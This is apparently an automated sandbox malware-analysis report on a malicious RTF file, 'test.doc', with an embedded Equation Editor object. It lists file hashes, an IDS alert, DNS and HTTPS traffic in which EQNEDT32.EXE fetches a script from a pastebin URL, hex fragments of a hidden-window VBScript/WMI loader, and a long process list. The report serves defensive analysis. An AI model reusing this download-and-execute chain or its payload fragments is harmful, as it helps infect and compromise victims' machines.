                    SHA-512:BB1FE94A523EF108C49F75DA187FCC28BBF80D72233454C329134BEE2E12268D3DA344A622987B081612AA2A1EDAC8B91EEF27619C7309517AC52E7AEBF32F1A
                    Malicious:false
                    Preview:..function OnLoad()..{.. ViewPanel.addBehavior("#default#mmcview");.. MMCEvents.ConnectTo(external.Document.Application);.. UpdateState();..}....// Prevent text from being selected and messing up the UI...function document.onselectstart()..{.. event.returnValue = false;..}....function UpdateState()..{.. var strDetails = "";.. var strDisplayName = "";.. var strDescription = "";.. var i;.. var curnode;.. var strNodeType;.... N = external.Selection;.... switch(N.count).. {.. case 0:.. DisplayNameElem.style.fontWeight="normal";.. strDetails = "";.. strDisplayName = L_strNoItemSelected_Text;.. break;.... case 1:.. DisplayNameElem.style.fontWeight="bold";.. strDetails = "";.. curNode = N(1);.... // got the selected node.. strNodeType = curNode.Nodetype;.. strDisplayName = external.CellContents(curNode, 1);.. strDescription = curNode.Property("CCF_DESCRIPTION");..
                    Process:C:\Windows\System32\mmc.exe
                    File Type:HTML document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):3413
                    Entropy (8bit):5.084486589571248
                    Encrypted:false
                    SSDEEP:48:4pPowKI58aHF/Au4Azk2qKz7+DomFh9I5G6XNl1wv6s6v7T2M4dl4qbR/s1:pkmaHF/ESzCn2vE6seCP4aR/s1
                    MD5:A726593A8261930E4786375106FC6BFE
                    SHA1:13916B1E1825549E9C36C64E35BACA204A83EF95
                    SHA-256:E6BFDFBB9A0649EA9D38DE4255C355C581097E6A1035A54943260B22AD45F172
                    SHA-512:B093A2513B2C4F8544093D6E983EC580E14625E1529BC3DB22C4011980CDF44A78443C22289B11A6ED0AFAE2786D480F94B354B71496EE022E439D2BDEFBEDD2
                    Malicious:false
                    Preview:<html>.... <head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8">.. <style>.. body {margin: 0; font: icon; color: windowtext; background:window; overflow:none}.. span {font:icon;}.. #FolderIcon {height:expression(TaskpadName.clientHeight + 10); width:100%;}.. #TaskpadName {font: caption; color:captiontext; margin-left:0; margin-right:0; margin-top: 0; width:100%; border:0; padding-left:3; padding-top:5; padding-bottom:7;}.. #DisplayNameElem {font:icon; padding-left:5px; padding-top:5px; padding-bottom:3px; padding-right:5px}.. #Details {padding-left: 12px; margin-top: 8px; overflow:auto}.. #DescriptionElem {padding-left: 12px; margin-top: 8px; overflow-y:scroll; overflow:auto}.. A:visited {color:expression(document.linkColor);}.. A:hover {color:expression(document.linkColor);}.. </style>.... <script language="javascript">.. var L_strNoItemSelected_Text
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:true
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                    File type:Rich Text Format data, version 1
                    Entropy (8bit):4.321219506825332
                    TrID:
                    • Rich Text Format (5005/1) 55.56%
                    • Rich Text Format (4004/1) 44.44%
                    File name:test.doc
                    File size:2'177 bytes
                    MD5:f5fc224eb5cbbff8ee4bf4670ed9611a
                    SHA1:8e3f85dd6fb94da77990987bd26bde7e59042490
                    SHA256:80f7f23bea03b2386ae91e156835c2a685d9515e0c42f4dd89f782d64a29f701
                    SHA512:4902cd1f9f166a2bc3136276e2baf251e40dc196885be38e8b38f034fa9829b390c82a9ea9474cb11c3f84460997540489a3455d327ae62ae7f95f78131f8330
                    SSDEEP:48:TDvLnzDXi5xokbzjEsTG6en2HwDEEEEEEEEEEd:TDvLPSxJFC/2sEEEEEEEEEEd
                    TLSH:4341704405DE94C0FC1128A32416B3B3817BFD3A36C45900B4E4D3C0FA5A90A087BEAE
                    File Content Preview:{\rtf1..{\^\rtf\object\objocx\198923813}{.\object{\.\rtf\object\objocx\198923813}{.\objocx.{\^\rtf\object\objocx\198923813}\objdata..a0b0d1c1020000000C0000004{\.\rtf\object\objwindupdates\198923813}551556174496F6E2{\.\rtf\object\objocx\198923813}e3{\.\rtf
                    Icon Hash:2764a3aaaeb7bdbf
                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                    00000007Fh2embeddedEQUatIon.2876no
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-13T17:15:09.259053+02002027374ET MALWARE Unknown VBScript Loader with Encoded PowerShell Execution Inbound1104.20.4.235443192.168.2.2249161TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 13, 2024 17:15:07.329972029 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:07.330066919 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:07.330178976 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:07.342709064 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:07.342749119 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:07.829035044 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:07.829200983 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:07.834789038 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:07.834847927 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:07.835349083 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:07.835505009 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:07.904067039 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:07.947416067 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:09.258347034 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:09.258464098 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:09.258507013 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:09.258536100 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:09.258564949 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:09.258594036 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:09.258636951 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:09.258698940 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:09.258729935 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:09.258780956 CEST44349161104.20.4.235192.168.2.22
                    Oct 13, 2024 17:15:09.258794069 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:09.258835077 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:09.261720896 CEST49161443192.168.2.22104.20.4.235
                    Oct 13, 2024 17:15:09.261754036 CEST44349161104.20.4.235192.168.2.22
                    TimestampSource PortDest PortSource IPDest IP
                    Oct 13, 2024 17:15:07.309139967 CEST5456253192.168.2.228.8.8.8
                    Oct 13, 2024 17:15:07.318932056 CEST53545628.8.8.8192.168.2.22
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Oct 13, 2024 17:15:07.309139967 CEST192.168.2.228.8.8.80xd682Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Oct 13, 2024 17:15:07.318932056 CEST8.8.8.8192.168.2.220xd682No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                    Oct 13, 2024 17:15:07.318932056 CEST8.8.8.8192.168.2.220xd682No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                    Oct 13, 2024 17:15:07.318932056 CEST8.8.8.8192.168.2.220xd682No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                    • pastebin.com
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.2249161104.20.4.2354433368C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampBytes transferredDirectionData
                    2024-10-13 15:15:07 UTC335OUTGET /raw/JtdAmHD5 HTTP/1.1
                    Accept: */*
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-10-13 15:15:09 UTC388INHTTP/1.1 200 OK
                    Date: Sun, 13 Oct 2024 15:15:08 GMT
                    Content-Type: text/plain; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    x-frame-options: DENY
                    x-content-type-options: nosniff
                    x-xss-protection: 1;mode=block
                    cache-control: public, max-age=1801
                    CF-Cache-Status: MISS
                    Last-Modified: Sun, 13 Oct 2024 15:15:08 GMT
                    Server: cloudflare
                    CF-RAY: 8d204886bf250f49-EWR
                    2024-10-13 15:15:09 UTC981INData Raw: 35 64 63 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 46 75 6e 63 74 69 6f 6e 20 76 61 72 5f 42 65 69 6e 6a 61 6d 61 6e 28 29 0d 0a 20 20 20 20 20 20 20 20 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 31 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 32 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 33 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 34 0d 0a 20 20 20 20 20 20 20 20 53 65 74 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 73 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 09 09 44 69 6d 20 44 75 6e 6a 61 6c 61 72 31 32 31 32 35 0d 0a 09
                    Data Ascii: 5dc<script language="VBScript"> Function var_Beinjaman() Dim Dunjalar1212Dim Dunjalar12121Dim Dunjalar12122Dim Dunjalar12123Dim Dunjalar12124 Set Dunjalar1212 = CreateObject("Wscript.Shell")Dim Dunjalar12125
                    2024-10-13 15:15:09 UTC526INData Raw: 09 43 6f 6e 73 74 20 48 49 44 44 45 4e 5f 57 49 4e 44 4f 57 20 3d 20 31 32 0d 0a 09 53 65 74 20 4c 6f 63 61 74 6f 72 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 62 65 6d 53 63 72 69 70 74 69 6e 67 2e 53 57 62 65 6d 4c 6f 63 61 74 6f 72 22 29 0d 0a 09 53 65 74 20 53 65 72 76 69 63 65 20 3d 20 4c 6f 63 61 74 6f 72 2e 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 28 29 0d 0a 09 53 65 72 76 69 63 65 2e 53 65 63 75 72 69 74 79 5f 2e 49 6d 70 65 72 73 6f 6e 61 74 69 6f 6e 4c 65 76 65 6c 3d 69 6d 70 65 72 73 6f 6e 61 74 69 6f 6e 0d 0a 09 53 65 74 20 6f 62 6a 53 74 61 72 74 75 70 20 3d 20 53 65 72 76 69 63 65 2e 47 65 74 28 22 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 53 74 61 72 74 75 70 22 29 0d 0a 09 53 65 74 20 6f 62 6a 43 6f 6e 66 69 67 20 3d 20 6f 62 6a 53
                    Data Ascii: Const HIDDEN_WINDOW = 12Set Locator = CreateObject("WbemScripting.SWbemLocator")Set Service = Locator.ConnectServer()Service.Security_.ImpersonationLevel=impersonationSet objStartup = Service.Get("Win32_ProcessStartup")Set objConfig = objS
                    2024-10-13 15:15:09 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:11:15:02
                    Start date:13/10/2024
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13ffc0000
                    File size:1'423'704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:2
                    Start time:11:15:04
                    Start date:13/10/2024
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543'304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:5
                    Start time:11:16:04
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:7
                    Start time:11:16:11
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:8
                    Start time:11:16:14
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:9
                    Start time:11:16:18
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:10
                    Start time:11:16:25
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:12
                    Start time:11:16:30
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:13
                    Start time:11:16:35
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:14
                    Start time:11:16:36
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:false

                    Target ID:15
                    Start time:11:16:45
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:16
                    Start time:11:16:49
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:17
                    Start time:11:16:55
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:18
                    Start time:11:17:01
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:19
                    Start time:11:17:05
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:20
                    Start time:11:17:09
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:21
                    Start time:11:17:15
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:22
                    Start time:11:17:15
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:23
                    Start time:11:17:25
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:24
                    Start time:11:17:29
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:25
                    Start time:11:17:35
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:26
                    Start time:11:17:41
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:27
                    Start time:11:17:45
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:28
                    Start time:11:17:49
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:29
                    Start time:11:17:55
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:30
                    Start time:11:17:56
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:31
                    Start time:11:18:06
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:32
                    Start time:11:18:10
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:33
                    Start time:11:18:16
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:34
                    Start time:11:18:17
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:35
                    Start time:11:18:26
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:36
                    Start time:11:18:31
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:37
                    Start time:11:18:36
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Target ID:38
                    Start time:11:18:40
                    Start date:13/10/2024
                    Path:C:\Windows\System32\mmc.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
                    Imagebase:0xff220000
                    File size:2'144'256 bytes
                    MD5 hash:9FEA051A9585F2A303D55745B4BF63AA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:false

                    Target ID:39
                    Start time:11:18:46
                    Start date:13/10/2024
                    Path:C:\Windows\System32\taskmgr.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\taskmgr.exe"
                    Imagebase:0xffc80000
                    File size:257'024 bytes
                    MD5 hash:09F7401D56F2393C6CA534FF0241A590
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Reset < >
                      Memory Dump Source
                      • Source File: 00000007.00000002.1538832218.0000000003C90000.00000010.00000800.00020000.00000000.sdmp, Offset: 03C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_3c90000_mmc.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                      • Instruction ID: 8db4134408ffa56065f8b0d22021f85a7f4ca5c03fb4b44f6bd28eb2aa432f07
                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
